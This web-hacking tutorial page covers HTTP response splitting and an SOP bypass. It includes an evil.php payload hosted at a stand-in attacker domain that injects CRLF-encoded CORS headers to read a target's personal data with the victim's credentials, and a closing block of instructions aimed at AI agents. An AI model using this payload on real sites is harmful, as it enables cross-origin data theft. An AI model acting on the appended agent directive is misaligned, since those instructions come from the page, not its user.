# HTTP Response Splitting

The HTTP standard uses \r\n as part of it syntax/parsing to establish where data starts and headers end. Because of this an attacker may be able to prematurely split the response header and have a single response interpreted as 2 responses effectively creating 2 **response blocks**. This functionality can be abused. 

{% hint style="info" %}
This is different from [<mark style="color:purple;">**Header Injection**</mark>](#sop-bypass-header-injection) attacks where we are instead adding new headers to a single response block. &#x20;
{% endhint %}

### Things to look for:

* Application puts user input into a response header
* Set-Cookie is a good value to test
* Sites that pull referral domains to track your last visited site.&#x20;
* There may be sanitation to avoid

### Example from eLearn:

![Malicious Link](/files/cpQHKZ6lQEoiXcCvBqkS)

![Split Response](/files/w1g3jLw27kQ4MVdyWQ66)

This split response will make the browser load the second response into the browser. This response can contain such things as XSS and Apparent Defacement.

### SOP Bypass (header injection):

![](/files/3C0LFAycv6PYZxAfUpMJ)

![](/files/yNtcQrkuYKV50PRrKKUl)

Then the attacker would host an evil file at attacker.site/evil.php that will preform a JS call within the php to do a cross-domain AJAX request to steal data from the target domain.

{% tabs %}
{% tab title="evil.php" %}

```php
<script>
function loadXMLDoc()
    {
    var xmlhttp;
    xmlhttp=new XMLHttpRequest();
    xmlhttp.withCredentials =true;
    xmlhttp.onreadystatechange=function()
        {
        if (xmlhttp.readyState==4 && xmlhttp.status==200){
            document.getElementById("responseDiv").innerHTML=xmlhttp.responseText;
            }
    }
xmlhttp.open("GET","http://target.site/getPersonalData.php?trackingUrl=test%0d%0aAccess-Control-Allow-Origin;%20http://attacker.site%0d%0aAccess-Control-Allow-Credentials:%20true",true);
    xmlhttp.send();
    }</script>
```

{% endtab %}
{% endtabs %}

{% hint style="warning" %}
If the response splitting is not a vulnerable vector then the cross-origin request will be blocked.&#x20;
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.hackbook.io/web-application-hacking/web-techniques/http-response-splitting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.